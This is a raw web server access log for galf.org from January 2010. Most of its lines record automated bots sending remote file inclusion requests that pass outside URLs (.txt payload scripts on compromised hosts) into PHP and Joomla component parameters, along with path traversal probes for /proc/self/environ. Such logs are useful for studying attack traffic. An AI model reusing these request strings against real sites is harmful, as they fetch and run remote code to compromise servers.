200.201.180.130 - - [24/Jan/2010:16:23:47 -0800] "GET /logs/access_091228.log//components/com_simpleboard/image_upload.php?sbp=http://submundodigital.xpg.com.br/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:24:04 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:24:04 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:24:04 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:24:30 -0800] "GET /logs/access_091026.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:24:30 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:24:30 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:24:57 -0800] "GET /appserv/main.php?appserv_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:24:57 -0800] "GET /logs//appserv/main.php?appserv_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:24:57 -0800] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:16:25:24 -0800] "GET /admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:16:25:32 -0800] "GET /logs/access_100111.log%20%20//admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:16:25:33 -0800] "GET /logs/access_100104.log%20%20//admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:16:25:35 -0800] "GET /logs//admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:29:30 -0800] "GET /board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.180.124.135 - - [24/Jan/2010:16:29:33 -0800] "GET /logs//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.180.124.135 - - [24/Jan/2010:16:29:34 -0800] "GET /logs/access.log%20%20//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.126.154.177 - - [24/Jan/2010:16:30:14 -0800] "GET /index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
193.126.154.177 - - [24/Jan/2010:16:30:14 -0800] "GET /logs/index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:30:27 -0800] "GET /board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.180.124.135 - - [24/Jan/2010:16:30:30 -0800] "GET /logs//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.180.124.135 - - [24/Jan/2010:16:30:30 -0800] "GET /logs/access.log%20%20//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:30:57 -0800] "GET /appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:31:03 -0800] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:31:03 -0800] "GET /logs//appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:31:45 -0800] "GET /logs/access.log%20%20//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.180.124.135 - - [24/Jan/2010:16:31:45 -0800] "GET /logs//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:31:45 -0800] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:31:45 -0800] "GET /logs//appserv/main.php?appserv_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:31:45 -0800] "GET /appserv/main.php?appserv_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:31:49 -0800] "GET /board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:32:21 -0800] "GET /logs//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://www.nuoduo.com///bbs///.psy/scripts/example/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:32:21 -0800] "GET /board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://www.nuoduo.com///bbs///.psy/scripts/example/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:32:21 -0800] "GET /logs/access.log//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://www.nuoduo.com///bbs///.psy/scripts/example/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:32:42 -0800] "GET /logs//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
211.180.124.135 - - [24/Jan/2010:16:32:42 -0800] "GET /logs/access.log%20%20//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.180.124.135 - - [24/Jan/2010:16:32:46 -0800] "GET /board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.223.225.130 - - [24/Jan/2010:16:33:34 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [24/Jan/2010:16:36:02 -0800] "GET /index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
193.126.154.177 - - [24/Jan/2010:16:36:02 -0800] "GET /logs/index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:36:31 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:36:31 -0800] "GET /logs/access_090720.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:36:31 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [24/Jan/2010:16:37:21 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.113.224 - - [24/Jan/2010:16:37:22 -0800] "GET /cendoc/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
193.126.154.177 - - [24/Jan/2010:16:38:11 -0800] "GET /index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
193.126.154.177 - - [24/Jan/2010:16:39:25 -0800] "GET /logs/index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
193.126.154.177 - - [24/Jan/2010:16:39:49 -0800] "GET /index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
193.126.154.177 - - [24/Jan/2010:16:39:49 -0800] "GET /logs/index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
193.126.154.177 - - [24/Jan/2010:16:40:30 -0800] "GET /index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
193.126.154.177 - - [24/Jan/2010:16:40:31 -0800] "GET /logs/index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
58.230.162.220 - - [24/Jan/2010:16:58:17 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [24/Jan/2010:16:58:17 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [24/Jan/2010:16:58:17 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [24/Jan/2010:16:58:25 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [24/Jan/2010:16:58:25 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [24/Jan/2010:16:58:25 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [24/Jan/2010:17:00:13 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [24/Jan/2010:17:00:13 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.34.107.182 - - [24/Jan/2010:17:01:33 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.34.107.182 - - [24/Jan/2010:17:01:33 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.34.107.182 - - [24/Jan/2010:17:01:33 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.46.199.184 - - [24/Jan/2010:17:03:28 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:17:04:16 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:17:04:16 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:17:04:16 -0800] "GET /logs/access_091207.log%20%20//include/admin.lib.inc.php?site_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:17:06:02 -0800] "GET /logs/access_090713.log%20%20//include/admin.lib.inc.php?site_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.120.227.139 - - [24/Jan/2010:17:06:16 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.120.227.139 - - [24/Jan/2010:17:06:24 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.120.227.139 - - [24/Jan/2010:17:06:24 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.120.227.139 - - [24/Jan/2010:17:06:24 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:17:13:16 -0800] "GET /logs/access_100111.log%20%20//admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:17:13:16 -0800] "GET /admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:17:13:16 -0800] "GET /logs//admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:17:14:25 -0800] "GET /logs/access_100104.log%20%20//admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.103.63.90 - - [24/Jan/2010:17:17:15 -0800] "GET /logs/access.log//skin/ggambo6210_board/setup.php?setup[use_category]=1&dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.103.63.90 - - [24/Jan/2010:17:17:15 -0800] "GET /logs//skin/ggambo6210_board/setup.php?setup[use_category]=1&dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.138.88.246 - - [24/Jan/2010:17:21:51 -0800] "GET /logs/access_090720.log/errors.php?error=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [24/Jan/2010:17:21:51 -0800] "GET /errors.php?error=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [24/Jan/2010:17:21:52 -0800] "GET /logs/errors.php?error=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [24/Jan/2010:17:21:53 -0800] "GET /logs/access_090720.log/errors.php?error=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [24/Jan/2010:17:21:53 -0800] "GET /errors.php?error=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [24/Jan/2010:17:21:53 -0800] "GET /logs/errors.php?error=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.831" "www.galf.org"
87.250.252.242 - - [24/Jan/2010:17:32:51 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
200.226.134.29 - - [24/Jan/2010:17:33:11 -0800] "GET /logs/access_090720.log/errors.php?error=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [24/Jan/2010:17:33:11 -0800] "GET /errors.php?error=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [24/Jan/2010:17:33:12 -0800] "GET /logs/errors.php?error=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:17:35:46 -0800] "GET /logs/errors.php?error=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:17:35:46 -0800] "GET /errors.php?error=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:17:35:51 -0800] "GET /logs/access_091207.log%20%20/errors.php?error=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:17:36:16 -0800] "GET /logs/access_091123.log%20%20/errors.php?error=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:17:43:42 -0800] "GET /logs/access_090720.log/errors.php?error=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [24/Jan/2010:17:54:15 -0800] "GET /logs/access_090907.log HTTP/1.0" 200 3152962 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:17:57:54 -0800] "GET /kernel/delete_all.php//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.12.14 - - [24/Jan/2010:17:57:54 -0800] "GET /logs/access.log%20%20//kernel/delete_all.php//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.12.14 - - [24/Jan/2010:17:57:54 -0800] "GET /logs//kernel/delete_all.php//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.12.14 - - [24/Jan/2010:17:57:57 -0800] "GET /kernel/delete_all.php//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.12.14 - - [24/Jan/2010:17:57:57 -0800] "GET /logs//kernel/delete_all.php//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.12.14 - - [24/Jan/2010:17:57:57 -0800] "GET /logs/access.log%20%20//kernel/delete_all.php//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
151.8.79.19 - - [24/Jan/2010:18:03:29 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [24/Jan/2010:18:03:29 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [24/Jan/2010:18:03:29 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [24/Jan/2010:18:04:12 -0800] "GET /logs/access_091130.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [24/Jan/2010:18:04:20 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
151.8.79.19 - - [24/Jan/2010:18:04:20 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
151.8.79.19 - - [24/Jan/2010:18:04:20 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
194.63.235.157 - - [24/Jan/2010:18:05:52 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:05:52 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:05:52 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
